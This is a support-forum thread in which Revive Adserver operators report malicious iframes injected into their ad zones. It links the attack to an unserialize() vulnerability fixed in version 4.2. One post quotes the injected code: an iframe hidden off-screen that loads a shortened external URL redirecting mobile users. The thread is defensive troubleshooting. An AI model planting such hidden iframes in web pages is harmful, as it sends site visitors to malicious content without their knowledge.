mito22 Posted March 25, 2019 Report Share Posted March 25, 2019 Hi guys.... I've got the last version of revive.... From about a month.. maybe more.... I've got this issue.... On ZONE (banners) -> ADVANCED I've got someone that put an Iframe line where u put HTML.... also.... all the MOBILE USERS was bombarded of fake links and more.... This link is on my SSH.... virus free obiuvsly... http://www.daidegasforum.com/images2/856/revive-bug-iframe.jpg When I have a alarm by the users... I delete the iframe line and all goes ok.... I've upgraded Revive.... changed password.... but ... ALL THE SAME..... 3-4-5... 10 times per day too.... ANyone got a good idea to eradicate this problem? Thanks. Quote Link to comment Share on other sites More sharing options...
Ian vM Posted March 25, 2019 Report Share Posted March 25, 2019 Any rogue admin users? Why are you so sure there is not backdoor on your server? Quote Link to comment Share on other sites More sharing options...
mito22 Posted March 25, 2019 Author Report Share Posted March 25, 2019 38 minutes ago, Ian vM said: Any rogue admin users? Why are you so sure there is not backdoor on your server? Hi Ian... not... appears all ok.... Quote Link to comment Share on other sites More sharing options...
mito22 Posted March 26, 2019 Author Report Share Posted March 26, 2019 The exact code they're putting on HTML tabels of the various zone is: <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> There's a possibility to hide or censure part of this to will be inefecctive? Quote Link to comment Share on other sites More sharing options...
szeidler Posted April 2, 2019 Report Share Posted April 2, 2019 Have you seen this forum topic: ? This could be related. Quote Link to comment Share on other sites More sharing options...
nezirus Posted April 27, 2019 Report Share Posted April 27, 2019 (edited) It is related, see the release notes for Revive 4.2, first fixed security vulnerability. The exploit was active in the wild at least from December 2018, all pointing to the single unguarded unserialize() in adxmlrpc.php . Filtering POST requests was acceptable workaround (as suggested in ). Edited April 27, 2019 by nezirus Quote Link to comment Share on other sites More sharing options...
RELH Posted February 12, 2021 Report Share Posted February 12, 2021 this is a security vulnerability that still exists on revive adserver 5.0.5 or higher. revive-adserver can't find a solution, they always blame the other "server ..." I delete rows from the database every day Quote Link to comment Share on other sites More sharing options...
Ian vM Posted February 12, 2021 Report Share Posted February 12, 2021 4 hours ago, RELH said: this is a security vulnerability that still exists on revive adserver 5.0.5 or higher. revive-adserver can't find a solution, they always blame the other "server ..." I delete rows from the database every day Please elaborate ? Quote Link to comment Share on other sites More sharing options...
RELH Posted February 15, 2021 Report Share Posted February 15, 2021 (edited) On 2/12/2021 at 10:19 PM, Ian vM said: Veuillez préciser? I have the same problem on the latest version of Revive Adserver, it bothers me. I am on version 5.0.5 even though I am upgrading to a higher version. the problem remains the same. 1 - I clean the addition, the prefix of the tables 2 - updating with new files 3 changing the database password and username 4 - changing the administrator password 5 - the configuration of nginx when I request support for revive adserver. I only have one answer (please update revive adserver) Edited February 15, 2021 by RELH french to english Quote Link to comment Share on other sites More sharing options...
Ian vM Posted February 15, 2021 Report Share Posted February 15, 2021 then there is probably a backdoor placed on your server. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.